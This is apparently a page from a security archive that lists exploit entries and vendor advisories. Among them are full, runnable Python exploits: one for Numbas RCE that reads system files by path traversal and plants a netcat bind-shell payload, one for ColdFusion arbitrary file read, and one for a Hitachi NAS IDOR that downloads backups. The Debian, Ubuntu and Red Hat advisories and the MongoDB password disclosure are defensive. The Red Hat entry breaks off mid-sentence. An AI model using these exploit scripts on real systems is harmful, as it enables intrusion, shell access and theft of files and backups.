Numbas versions prior to 7.3 suffer from a remote code execution vulnerability.

    # Exploit Title: Numbas < v7.3 - Remote Code Execution# Google Dork: N/A# Date: March 7th, 2024# Exploit Author: Matheus Boschetti# Vendor Homepage: https://www.numbas.org.uk/# Software Link: https://github.com/numbas/Numbas# Version: 7.2 and below# Tested on: Linux# CVE: CVE-2024-27612import sys, requests, re, argparse, subprocess, timefrom bs4 import BeautifulSoups = requests.session()def getCSRF(target):    url = f"http://{target}/"    req = s.get(url)    soup = BeautifulSoup(req.text, 'html.parser')    csrfmiddlewaretoken = soup.find('input', attrs={'name': 'csrfmiddlewaretoken'})['value']    return csrfmiddlewaretokendef createTheme(target):    # Format request    csrfmiddlewaretoken = getCSRF(target)    theme = 'ExampleTheme'    boundary = '----WebKitFormBoundaryKUMXsLP31HzARUV1'    data = (        f'--{boundary}\r\n'        'Content-Disposition: form-data; name="csrfmiddlewaretoken"\r\n'        '\r\n'        f'{csrfmiddlewaretoken}\r\n'        f'--{boundary}\r\n'        'Content-Disposition: form-data; name="name"\r\n'        '\r\n'        f'{theme}\r\n'        f'--{boundary}--\r\n'    )    headers = {'Content-Type': f'multipart/form-data; boundary={boundary}',               'User-Agent': 'Mozilla/5.0',               'Accept': '*/*',               'Connection': 'close'}    # Create theme and return its ID    req = s.post(f"http://{target}/theme/new/", headers=headers, data=data)    redir = req.url    split = redir.split('/')    id = split[4]    print(f"\t[i] Theme created with ID {id}")    return iddef login(target, user, passwd):    print("\n[i] Attempting to login...")    csrfmiddlewaretoken = getCSRF(target)    data = {'csrfmiddlewaretoken': csrfmiddlewaretoken,            'username': user,            'password': passwd,            'next': '/'}        # Login    login = s.post(f"http://{target}/login/", data=data, allow_redirects=True)    res = login.text    if("Logged in as" not in res):        print("\n\n[!] Login failed!")        sys.exit(-1)    # Check if logged and fetch ID    usermatch = re.search(r'Logged in as <strong>(.*?)</strong>', res)    if usermatch:        user = usermatch.group(1)        idmatch = re.search(r'<a href="/accounts/profile/(.*?)/"><span class="glyphicon glyphicon-user">', res)        if idmatch:            id = idmatch.group(1)            print(f"\t[+] Logged in as \"{user}\" with ID {id}")def checkVuln(url):    print("[i] Checking if target is vulnerable...")    # Attempt to read files    themeID = createTheme(url)    target = f"http://{url}/themes/{themeID}/edit_source?filename=../../../../../../../../../.."    hname = s.get(f"{target}/etc/hostname")    ver = s.get(f"{target}/etc/issue")    hnamesoup = BeautifulSoup(hname.text, 'html.parser')    versoup = BeautifulSoup(ver.text, 'html.parser')    hostname = hnamesoup.find('textarea').get_text().strip()    version = versoup.find('textarea').get_text().strip()    if len(hostname) < 1:        print("\n\n[!] Something went wrong - target might not be vulnerable.")        sys.exit(-1)    print(f"\n[+] Target \"{hostname}\" is vulnerable!")    print(f"\t[i] Running: \"{version}\"")    # Cleanup - delete theme    print(f"\t\t[i] Cleanup: deleting theme {themeID}...")    target = f"http://{url}/themes/{themeID}/delete"    csrfmiddlewaretoken = getCSRF(url)    data = {'csrfmiddlewaretoken':csrfmiddlewaretoken}    s.post(target, data=data)def replaceInit(target):    # Overwrite __init__.py with arbitrary code    rport = '8443'    payload = f"import subprocess;subprocess.Popen(['nc','-lnvp','{rport}','-e','/bin/bash'])"    csrfmiddlewaretoken = getCSRF(target)    filename = '../../../../numbas_editor/numbas/__init__.py'    themeID = createTheme(target)    data = {'csrfmiddlewaretoken': csrfmiddlewaretoken,            'source': payload,            'filename': filename}    print("[i] Delivering payload...")    # Retry 5 times in case something goes wrong...    for attempt in range(5):        try:            s.post(f"http://{target}/themes/{themeID}/edit_source", data=data, timeout=10)        except Exception as e:            pass        # Establish connection to bind shell    time.sleep(2)    print(f"\t[+] Payload delivered, establishing connection...\n")    if ":" in target:        split = target.split(":")        ip = split[0]    else:        ip = str(target)    subprocess.Popen(["nc", "-n", ip, rport])    while True:        passdef main():    parser = argparse.ArgumentParser()    if len(sys.argv) <= 1:        print("\n[!] No option provided!")        print("\t- check: Passively check if the target is vulnerable by attempting to read files from disk\n\t- exploit: Attempt to actively exploit the target\n")        print(f"[i] Usage: python3 {sys.argv[0]} <option> --target 172.16.1.5:80 --user example --passwd qwerty")        sys.exit(-1)    group = parser.add_mutually_exclusive_group(required=True)    group.add_argument('action', nargs='?', choices=['check', 'exploit'], help='Action to perform: check or exploit')    parser.add_argument('--target', help='Target IP:PORT')    parser.add_argument('--user', help='Username to authenticate')    parser.add_argument('--passwd', help='Password to authenticate')    args = parser.parse_args()    action = args.action    target = args.target    user = args.user    passwd = args.passwd    print("\n\t\t-==[ CVE-2024-27612: Numbas Remote Code Execution (RCE) ]==-")        if action == 'check':        login(target, user, passwd)        checkVuln(target)    elif action == 'exploit':        login(target, user, passwd)        replaceInit(target)    else:        sys.exit(-1)if __name__ == "__main__":    main()

Numbas Remote Code Execution

Adobe ColdFusion versions 2018,15 and below and versions 2021,5 and below suffer from an arbitrary file read vulnerability.

# Exploit Title: File Read Arbitrary Exploit for CVE-2023-26360# Google Dork: [not]# Date: [12/28/2023]# Exploit Author: [Youssef Muhammad]# Vendor Homepage: [https://helpx.adobe.com/coldfusion/kb/coldfusion-downloads.html]# Software Link: [https://drive.google.com/drive/folders/17ryBnFhswxiE1sHrNByxMVPKfUnwqmp0]# Version: [Adobe ColdFusion versions 2018,15 (and earlier) and 2021,5 andearlier]# Tested on: [Windows, Linux]# CVE : [CVE-2023-26360]import sysimport requestsimport jsonBANNER = """   ██████ ██    ██ ███████       ██████   ██████  ██████  ██████        ██████   ██████  ██████   ██████   ██████    ██      ██    ██ ██                 ██ ██  ████      ██      ██            ██ ██            ██ ██       ██  ████   ██      ██    ██ █████   █████  █████  ██ ██ ██  █████   █████  █████  █████  ███████   █████  ███████  ██ ██ ██   ██       ██  ██  ██            ██      ████  ██ ██           ██       ██      ██    ██      ██ ██    ██ ████  ██    ██████   ████   ███████       ███████  ██████  ███████ ██████        ███████  ██████  ██████   ██████   ██████                                                                                                                                                                                                                                       """RED_COLOR = "\033[91m"GREEN_COLOR = "\032[42m"RESET_COLOR = "\033[0m"def print_banner():    print(RED_COLOR + BANNER + "                  Developed by SecureLayer7" + RESET_COLOR)    return 0def run_exploit(host, target_file, endpoint="/CFIDE/wizards/common/utils.cfc", proxy_url=None):    if not endpoint.endswith('.cfc'):        endpoint += '.cfc'    if target_file.endswith('.cfc'):        raise ValueError('The TARGET_FILE must not point to a .cfc')    targeted_file = f"a/{target_file}"    json_variables = json.dumps({"_metadata": {"classname": targeted_file}, "_variables": []})    vars_get = {'method': 'test', '_cfclient': 'true'}    uri = f'{host}{endpoint}'    response = requests.post(uri, params=vars_get, data={'_variables': json_variables}, proxies={'http': proxy_url, 'https': proxy_url} if proxy_url else None)    file_data = None    splatter = '</TD></TD></TD></TH></TH></TH>'    if response.status_code in [404, 500] and splatter in response.text:        file_data = response.text.split(splatter, 1)[0]    if file_data is None:        raise ValueError('Failed to read the file. Ensure the CFC_ENDPOINT, CFC_METHOD, and CFC_METHOD_PARAMETERS are set correctly, and that the endpoint is accessible.')    print(file_data)    # Save the output to a file    output_file_name = 'output.txt'    with open(output_file_name, 'w') as output_file:        output_file.write(file_data)        print(f"The output saved to {output_file_name}")if __name__ == "__main__":    if not 3 <= len(sys.argv) <= 5:        print("Usage: python3 script.py <host> <target_file> [endpoint] [proxy_url]")        sys.exit(1)    print_banner()    host = sys.argv[1]    target_file = sys.argv[2]    endpoint = sys.argv[3] if len(sys.argv) > 3 else "/CFIDE/wizards/common/utils.cfc"    proxy_url = sys.argv[4] if len(sys.argv) > 4 else None    try:        run_exploit(host, target_file, endpoint, proxy_url)    except Exception as e:        print(f"Error: {e}")

Adobe ColdFusion 2018,15 / 2021,5 Arbitrary File Read

Hitachi NAS SMU Backup and Restore versions prior to 14.8.7825.01 suffer from an insecure direct object reference vulnerability.

    #!/usr/bin/python3## Title:            Hitachi NAS (HNAS) System Management Unit (SMU) Backup & Restore IDOR Vulnerability # CVE:              CVE-2023-5808# Date:             2023-12-13# Exploit Author:   Arslan Masood (@arszilla)# Vendor:           https://www.hitachivantara.com/# Version:          < 14.8.7825.01# Tested On:        13.9.7021.04        import argparsefrom datetime import datetimefrom os import getcwdimport requestsparser = argparse.ArgumentParser(    description="CVE-2023-5808 PoC",    usage="./CVE-2023-5808.py --host <Hostname/FQDN/IP> --id <JSESSIONID> --sso <JSESSIONIDSSO>"    )# Create --host argument:parser.add_argument(    "--host",    required=True,    type=str,    help="Hostname/FQDN/IP Address. Provide the port, if necessary, i.e. 127.0.0.1:8443, example.com:8443"    )# Create --id argument:parser.add_argument(    "--id",    required=True,    type=str,    help="JSESSIONID cookie value"    )# Create --sso argument:parser.add_argument(    "--sso",    required=True,    type=str,    help="JSESSIONIDSSO cookie value"    )args = parser.parse_args()def download_file(hostname, jsessionid, jsessionidsso):    # Set the filename:    filename = f"smu_backup-{datetime.now().strftime('%Y-%m-%d_%H%M')}.zip"    # Vulnerable SMU URL:    smu_url = f"https://{hostname}/mgr/app/template/simple%2CBackupSmuScreen.vm/password/"    # GET request cookies    smu_cookies = {        "JSESSIONID":       jsessionid,        "JSESSIONIDSSO":    jsessionidsso        }    # GET request headers:    smu_headers = {        "User-Agent":                   "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0",        "Accept":                       "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",        "Accept-Language":              "en-US,en;q=0.5",        "Accept-Encoding":              "gzip, deflate",        "Dnt":                          "1",        "Referer":                      f"https://{hostname}/mgr/app/action/admin.SmuBackupRestoreAction/eventsubmit_doperform/ignored",        "Upgrade-Insecure-Requests":    "1",        "Sec-Fetch-Dest":               "document",        "Sec-Fetch-Mode":               "navigate",        "Sec-Fetch-Site":               "same-origin",        "Sec-Fetch-User":               "?1",        "Te":                           "trailers",        "Connection":                   "close"        }    # Send the request:    with requests.get(smu_url, headers=smu_headers, cookies=smu_cookies, stream=True, verify=False) as file_download:        with open(filename, 'wb') as backup_archive:            # Write the zip file to the CWD:            backup_archive.write(file_download.content)    print(f"{filename} has been downloaded to {getcwd()}")if __name__ == "__main__":    download_file(args.host, args.id, args.sso)

Hitachi NAS SMU Backup And Restore Insecure Direct Object Reference

Debian Linux Security Advisory 5637-1 - Several security vulnerabilities have been discovered in Squid, a full featured web proxy cache. Due to programming errors in Squid's HTTP request parsing, remote attackers may be able to execute a denial of service attack by sending large X-Forwarded-For header or trigger a stack buffer overflow while performing HTTP Digest authentication. Other issues facilitate request smuggling past a firewall or a denial of service against Squid's Helper process management.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5637-1                   security@debian.org  
https://www.debian.org/security/                          Markus Koschany  
March 08, 2024                        https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : squid  
CVE ID         : CVE-2023-46724 CVE-2023-46846 CVE-2023-46847 CVE-2023-49285  
                 CVE-2023-49286 CVE-2023-50269 CVE-2024-23638 CVE-2024-25617  
                 CVE-2023-46848 CVE-2024-25111  
Debian Bug     : 1055252 1054537 1055250 1055251 1058721

Several security vulnerabilities have been discovered in Squid, a full featured  
web proxy cache. Due to programming errors in Squid's HTTP request parsing,  
remote attackers may be able to execute a denial of service attack by sending  
large X-Forwarded-For header or trigger a stack buffer overflow while  
performing HTTP Digest authentication. Other issues facilitate request  
smuggling past a firewall or a denial of service against Squid's Helper process  
management.

In regard to CVE-2023-46728: Please note that support for the Gopher protocol  
has simply been removed in future Squid versions. There are no plans by the  
upstream developers of Squid to fix this issue. We recommend to reject all  
Gopher URL requests instead.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 4.13-10+deb11u3.

For the stable distribution (bookworm), these problems have been fixed in  
version 5.7-2+deb12u1.

We recommend that you upgrade your squid packages.

For the detailed security status of squid please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/squid

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmXrHBNfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD  
RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7  
UeSFng/+JAY5jG6Z/fVFf2M9SsqFhQm8mGT1CgOx39dYirUkdpcFOyADqWopwv+q  
tci90QFuhnreW1DmO1GYRlZro+37iRjiryRKxETpUB1AnpPWs6RnyAA+mrqssDqg  
PxxFkqpJFtpMhZU3VkDDbTkkvK2T0Hwjdn8TND6qA+B56exwW2DEZlm5aqCPiWRf  
pdzPZTOZJEV2fT4UPWduiIN1l94VsLktfZY5Ox0/HmrdkAWJJFXQhj3wZPcbFLbB  
leQ7Nkq6mpuw98UxOSa7hsE0crPm6ctrf7AYMx+qojtWJFcbFE+mUqzcf0aFYp0L  
EfTSVAOVEXvbFytlX/oSWYE5GrZtTrnwProiXFJT7WvDYN2Mbqxgp/jB3jZygmrZ  
rknvF84haHX16ZMXRlBDOlx1E3XSCB+/xRynwbGQe8RPzSRlOKuiFqn+qr3qCtOd  
5Ua2+ZJXDpEP4aUseFb94FwJRfs9onBS+EYPt2xwcxcBGUiMJ/lY9Fj9p5MjQ1bZ  
nCXuRNo2ao6qumLSraK2qPle7AucbuOtiMDsMFi6rGu3H0RVlk7oWGFO4rMRAcvX  
IBYU2bWBIyi7J4IvJd+07QfNgofPvcld9XN7/LDgizmMZpCorpPq39Ta24y7U3e5  
Zv+ye/kOYKuD0ij7M7jkT2hgxq6kKdlSEZbZ/wrlkSILrcjgwqw=  
=qmZY  
-----END PGP SIGNATURE-----

Debian Security Advisory 5637-1

Ubuntu Security Notice 6680-2 - 黄思聪 discovered that the NFC Controller Interface implementation in the Linux kernel did not properly handle certain memory allocation failure conditions, leading to a null pointer dereference vulnerability. A local attacker could use this to cause a denial of service. It was discovered that a race condition existed in the Bluetooth subsystem of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6680-2  
March 08, 2024

linux-azure, linux-azure-6.5, linux-hwe-6.5 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-azure: Linux kernel for Microsoft Azure Cloud systems  
- linux-azure-6.5: Linux kernel for Microsoft Azure cloud systems  
- linux-hwe-6.5: Linux hardware enablement (HWE) kernel

Details:

黄思聪 discovered that the NFC Controller Interface (NCI) implementation in  
the Linux kernel did not properly handle certain memory allocation failure  
conditions, leading to a null pointer dereference vulnerability. A local  
attacker could use this to cause a denial of service (system crash).  
(CVE-2023-46343)

It was discovered that a race condition existed in the Bluetooth subsystem  
of the Linux kernel, leading to a use-after-free vulnerability. A local  
attacker could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2023-51779)

It was discovered that a race condition existed in the Rose X.25 protocol  
implementation in the Linux kernel, leading to a use-after- free  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2023-51782)

Alon Zahavi discovered that the NVMe-oF/TCP subsystem of the Linux kernel  
did not properly handle connect command payloads in certain situations,  
leading to an out-of-bounds read vulnerability. A remote attacker could use  
this to expose sensitive information (kernel memory). (CVE-2023-6121)

Jann Horn discovered that the io_uring subsystem in the Linux kernel  
contained an out-of-bounds access vulnerability. A local attacker could use  
this to cause a denial of service (system crash). (CVE-2023-6560)

Dan Carpenter discovered that the netfilter subsystem in the Linux kernel  
did not store data in properly sized memory locations. A local user could  
use this to cause a denial of service (system crash). (CVE-2024-0607)

Supraja Sridhara, Benedict Schlüter, Mark Kuhne, Andrin Bertschi, and  
Shweta Shinde discovered that the Confidential Computing framework in the  
Linux kernel for x86 platforms did not properly handle 32-bit emulation on  
TDX and SEV. An attacker with access to the VMM could use this to cause a  
denial of service (guest crash) or possibly execute arbitrary code.  
(CVE-2024-25744)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
   linux-image-6.5.0-1016-azure    6.5.0-1016.16  
   linux-image-6.5.0-1016-azure-fde  6.5.0-1016.16  
   linux-image-azure               6.5.0.1016.18  
   linux-image-azure-fde           6.5.0.1016.18

Ubuntu 22.04 LTS:  
   linux-image-6.5.0-1016-azure    6.5.0-1016.16~22.04.1  
   linux-image-6.5.0-1016-azure-fde  6.5.0-1016.16~22.04.1  
   linux-image-6.5.0-25-generic    6.5.0-25.25~22.04.1  
   linux-image-6.5.0-25-generic-64k  6.5.0-25.25~22.04.1  
   linux-image-azure               6.5.0.1016.16~22.04.1  
   linux-image-azure-fde           6.5.0.1016.16~22.04.1  
   linux-image-generic-64k-hwe-22.04  6.5.0.25.25~22.04.12  
   linux-image-generic-hwe-22.04   6.5.0.25.25~22.04.12  
   linux-image-virtual-hwe-22.04   6.5.0.25.25~22.04.12

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6680-2  
   https://ubuntu.com/security/notices/USN-6680-1  
   CVE-2023-46343, CVE-2023-51779, CVE-2023-51782, CVE-2023-6121,  
   CVE-2023-6560, CVE-2024-0607, CVE-2024-25744

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-azure/6.5.0-1016.16  
   https://launchpad.net/ubuntu/+source/linux-azure-6.5/6.5.0-1016.16~22.04.1  
   https://launchpad.net/ubuntu/+source/linux-hwe-6.5/6.5.0-25.25~22.04.1

Ubuntu Security Notice USN-6680-2

Ubuntu Security Notice 6686-1 - It was discovered that the DesignWare USB3 for Qualcomm SoCs driver in the Linux kernel did not properly handle certain error conditions during device registration. A local attacker could possibly use this to cause a denial of service. It was discovered that a race condition existed in the Cypress touchscreen driver in the Linux kernel during device removal, leading to a use-after- free vulnerability. A physically proximate attacker could use this to cause a denial of service or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6686-1March 08, 2024linux, linux-azure, linux-azure-5.15, linux-azure-fde,linux-azure-fde-5.15, linux-gcp, linux-gcp-5.15, linux-gke, linux-gkeop,linux-gkeop-5.15, linux-hwe-5.15, linux-ibm, linux-ibm-5.15,linux-lowlatency-hwe-5.15, linux-nvidia vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-azure: Linux kernel for Microsoft Azure Cloud systems- linux-azure-fde: Linux kernel for Microsoft Azure CVM cloud systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-gke: Linux kernel for Google Container Engine (GKE) systems- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-nvidia: Linux kernel for NVIDIA systems- linux-azure-5.15: Linux kernel for Microsoft Azure cloud systems- linux-azure-fde-5.15: Linux kernel for Microsoft Azure CVM cloud systems- linux-gcp-5.15: Linux kernel for Google Cloud Platform (GCP) systems- linux-gkeop-5.15: Linux kernel for Google Container Engine (GKE) systems- linux-hwe-5.15: Linux hardware enablement (HWE) kernel- linux-ibm-5.15: Linux kernel for IBM cloud systems- linux-lowlatency-hwe-5.15: Linux low latency kernelDetails:It was discovered that the DesignWare USB3 for Qualcomm SoCs driver in theLinux kernel did not properly handle certain error conditions during deviceregistration. A local attacker could possibly use this to cause a denial ofservice (system crash). (CVE-2023-22995)It was discovered that a race condition existed in the Cypress touchscreendriver in the Linux kernel during device removal, leading to a use-after-free vulnerability. A physically proximate attacker could use this to causea denial of service (system crash) or possibly execute arbitrary code.(CVE-2023-4134)黄思聪 discovered that the NFC Controller Interface (NCI) implementation inthe Linux kernel did not properly handle certain memory allocation failureconditions, leading to a null pointer dereference vulnerability. A localattacker could use this to cause a denial of service (system crash).(CVE-2023-46343)It was discovered that the io_uring subsystem in the Linux kernel containeda race condition, leading to a null pointer dereference vulnerability. Alocal attacker could use this to cause a denial of service (system crash).(CVE-2023-46862)It was discovered that a race condition existed in the Bluetooth subsystemof the Linux kernel, leading to a use-after-free vulnerability. A localattacker could use this to cause a denial of service (system crash) orpossibly execute arbitrary code. (CVE-2023-51779)It was discovered that a race condition existed in the Rose X.25 protocolimplementation in the Linux kernel, leading to a use-after- freevulnerability. A local attacker could use this to cause a denial of service(system crash) or possibly execute arbitrary code. (CVE-2023-51782)Alon Zahavi discovered that the NVMe-oF/TCP subsystem of the Linux kerneldid not properly handle connect command payloads in certain situations,leading to an out-of-bounds read vulnerability. A remote attacker could usethis to expose sensitive information (kernel memory). (CVE-2023-6121)It was discovered that the VirtIO subsystem in the Linux kernel did notproperly initialize memory in some situations. A local attacker could usethis to possibly expose sensitive information (kernel memory).(CVE-2024-0340)Dan Carpenter discovered that the netfilter subsystem in the Linux kerneldid not store data in properly sized memory locations. A local user coulduse this to cause a denial of service (system crash). (CVE-2024-0607)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:   linux-image-5.15.0-100-generic  5.15.0-100.110   linux-image-5.15.0-100-generic-64k  5.15.0-100.110   linux-image-5.15.0-100-generic-lpae  5.15.0-100.110   linux-image-5.15.0-1038-gkeop   5.15.0-1038.44   linux-image-5.15.0-1046-nvidia  5.15.0-1046.46   linux-image-5.15.0-1046-nvidia-lowlatency  5.15.0-1046.46   linux-image-5.15.0-1048-ibm     5.15.0-1048.51   linux-image-5.15.0-1052-gke     5.15.0-1052.57   linux-image-5.15.0-1053-gcp     5.15.0-1053.61   linux-image-5.15.0-1058-azure   5.15.0-1058.66   linux-image-5.15.0-1058-azure-fde  5.15.0-1058.66.1   linux-image-azure-fde-lts-22.04  5.15.0.1058.66.36   linux-image-azure-lts-22.04     5.15.0.1058.54   linux-image-gcp-lts-22.04       5.15.0.1053.49   linux-image-generic             5.15.0.100.97   linux-image-generic-64k         5.15.0.100.97   linux-image-generic-lpae        5.15.0.100.97   linux-image-gke                 5.15.0.1052.51   linux-image-gke-5.15            5.15.0.1052.51   linux-image-gkeop               5.15.0.1038.37   linux-image-gkeop-5.15          5.15.0.1038.37   linux-image-ibm                 5.15.0.1048.44   linux-image-nvidia              5.15.0.1046.46   linux-image-nvidia-lowlatency   5.15.0.1046.46   linux-image-virtual             5.15.0.100.97Ubuntu 20.04 LTS:   linux-image-5.15.0-100-generic  5.15.0-100.110~20.04.1   linux-image-5.15.0-100-generic-64k  5.15.0-100.110~20.04.1   linux-image-5.15.0-100-generic-lpae  5.15.0-100.110~20.04.1   linux-image-5.15.0-100-lowlatency  5.15.0-100.110~20.04.1   linux-image-5.15.0-100-lowlatency-64k  5.15.0-100.110~20.04.1   linux-image-5.15.0-1038-gkeop   5.15.0-1038.44~20.04.1   linux-image-5.15.0-1048-ibm     5.15.0-1048.51~20.04.1   linux-image-5.15.0-1053-gcp     5.15.0-1053.61~20.04.1   linux-image-5.15.0-1058-azure   5.15.0-1058.66~20.04.2   linux-image-5.15.0-1058-azure-fde  5.15.0-1058.66~20.04.2.1   linux-image-azure               5.15.0.1058.66~20.04.48   linux-image-azure-cvm           5.15.0.1058.66~20.04.48   linux-image-azure-fde           5.15.0.1058.66~20.04.1.36   linux-image-gcp                 5.15.0.1053.61~20.04.1   linux-image-generic-64k-hwe-20.04  5.15.0.100.110~20.04.52   linux-image-generic-hwe-20.04   5.15.0.100.110~20.04.52   linux-image-generic-lpae-hwe-20.04  5.15.0.100.110~20.04.52   linux-image-gkeop-5.15          5.15.0.1038.44~20.04.34   linux-image-ibm                 5.15.0.1048.51~20.04.20   linux-image-lowlatency-64k-hwe-20.04  5.15.0.100.110~20.04.49   linux-image-lowlatency-hwe-20.04  5.15.0.100.110~20.04.49   linux-image-oem-20.04           5.15.0.100.110~20.04.52   linux-image-oem-20.04b          5.15.0.100.110~20.04.52   linux-image-oem-20.04c          5.15.0.100.110~20.04.52   linux-image-oem-20.04d          5.15.0.100.110~20.04.52   linux-image-virtual-hwe-20.04   5.15.0.100.110~20.04.52After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6686-1   CVE-2023-22995, CVE-2023-4134, CVE-2023-46343, CVE-2023-46862,   CVE-2023-51779, CVE-2023-51782, CVE-2023-6121, CVE-2024-0340,   CVE-2024-0607Package Information:   https://launchpad.net/ubuntu/+source/linux/5.15.0-100.110   https://launchpad.net/ubuntu/+source/linux-azure/5.15.0-1058.66   https://launchpad.net/ubuntu/+source/linux-azure-fde/5.15.0-1058.66.1   https://launchpad.net/ubuntu/+source/linux-gcp/5.15.0-1053.61   https://launchpad.net/ubuntu/+source/linux-gke/5.15.0-1052.57   https://launchpad.net/ubuntu/+source/linux-gkeop/5.15.0-1038.44   https://launchpad.net/ubuntu/+source/linux-ibm/5.15.0-1048.51   https://launchpad.net/ubuntu/+source/linux-nvidia/5.15.0-1046.46   https://launchpad.net/ubuntu/+source/linux-azure-5.15/5.15.0-1058.66~20.04.2 https://launchpad.net/ubuntu/+source/linux-azure-fde-5.15/5.15.0-1058.66~20.04.2.1   https://launchpad.net/ubuntu/+source/linux-gcp-5.15/5.15.0-1053.61~20.04.1   https://launchpad.net/ubuntu/+source/linux-gkeop-5.15/5.15.0-1038.44~20.04.1   https://launchpad.net/ubuntu/+source/linux-hwe-5.15/5.15.0-100.110~20.04.1   https://launchpad.net/ubuntu/+source/linux-ibm-5.15/5.15.0-1048.51~20.04.1 https://launchpad.net/ubuntu/+source/linux-lowlatency-hwe-5.15/5.15.0-100.110~20.04.1

Ubuntu Security Notice USN-6686-1

MongoDB versions 2.0.1, 2.1.1, 2.1.4, and 2.1.5 appear to suffer from multiple localized password disclosure issues.

    Title: MongoDB MONGOSH Password Exposure VulnerabilityProduct:                   MongoDB databaseTool:                      mongoshAffected Version(s):       2.0.1 , 2.1.1,2.1.4,2.1.5Tested Version(s):         2.0.1 , 2.1.1,2.1.4,2.1.5Risk Level:                LowAuthor of Advisory:        Emad Al-Mousa*****************************************Vulnerability Details:Vulnerability in MongoDB database system "mongosh" which  is a JavaScript and Node.js REPL environment for interacting with MongoDB deployments in Atlas , locally, or on another remote host. So, its basically a command line utility to run database commands and java scripts against back-end MongoDB database system.MONGOSH has two vulnerbailites where passwords can be exposed and leaked in which an attacker to the operating system can weaponize for unauthorized access to the MongoDB database system.*****************************************Proof of Concept (PoC):Vulnerability No1. : passwordPrompt() showing password displayed in clear textper documentation:https://www.mongodb.com/docs/manual/reference/method/passwordPrompt/#mongodb-method-passwordPromptThe password should not be displayed, however I found out that it appears clearly in the prompt !The password function passwordPrompt() was tested and used in conjunction with db.createUser, db.changeUserPassword, db.auth commands and all of them were allowing clear text password to appear.admin> use adminalready on db adminadmin> db.createUser({user:"mongo2", pwd: passwordPrompt(), roles:["root"]})Enter passwordmongo*****{ ok: 1 }admin>Vulnerability No2. : Password is exposed in mongosh_repl_history file with db.auth commandMongosh was tested with both “remove”& “remove-redact” modesconfig.set (redactHistory, “remove-redact”)config.set (‘redactHistory’, “remove”)In Linux Red Hat Environment the file: $MONGOHOME/.mongodb/mongosh/mongosh_repl_historyContains the password in clear text for historical  commands run for authentication db.auth() and db.createUser  , per documentation: https://www.mongodb.com/docs/mongodb-shell/logs/ the logs should omit the credentials but this didn’t happen !In windows operating system environment the file: C:\Users\windows_profile_user\AppData\Roaming\mongodb\mongoshCommands running for database creation db.createUser and db.auth()  are logging the username, password explicitly as shown below:cat mongosh_repl_historyuse admindb.createUser({user:"mongo2", pwd: passwordPrompt(), roles:["root"]})*****************************************References:https://databasesecurityninja.wordpress.com/2024/03/07/mongodb-mongosh-password-exposure-vulnerability/https://www.mongodb.com/docs/manual/reference/method/passwordPrompt/#mongodb-method-passwordPrompthttps://www.mongodb.com/docs/mongodb-shell/logs/

MongoDB 2.0.1 / 2.1.1 / 2.1.4 / 2.1.5 Local Password Disclosure

Red Hat Security Advisory 2024-1239-03 - An update for opencryptoki is now available for Red Hat Enterprise Linux 9.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1239.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: opencryptoki security updateAdvisory ID:        RHSA-2024:1239-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1239Issue date:         2024-03-08Revision:           03CVE Names:          CVE-2024-0914====================================================================Summary: An update for opencryptoki is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed 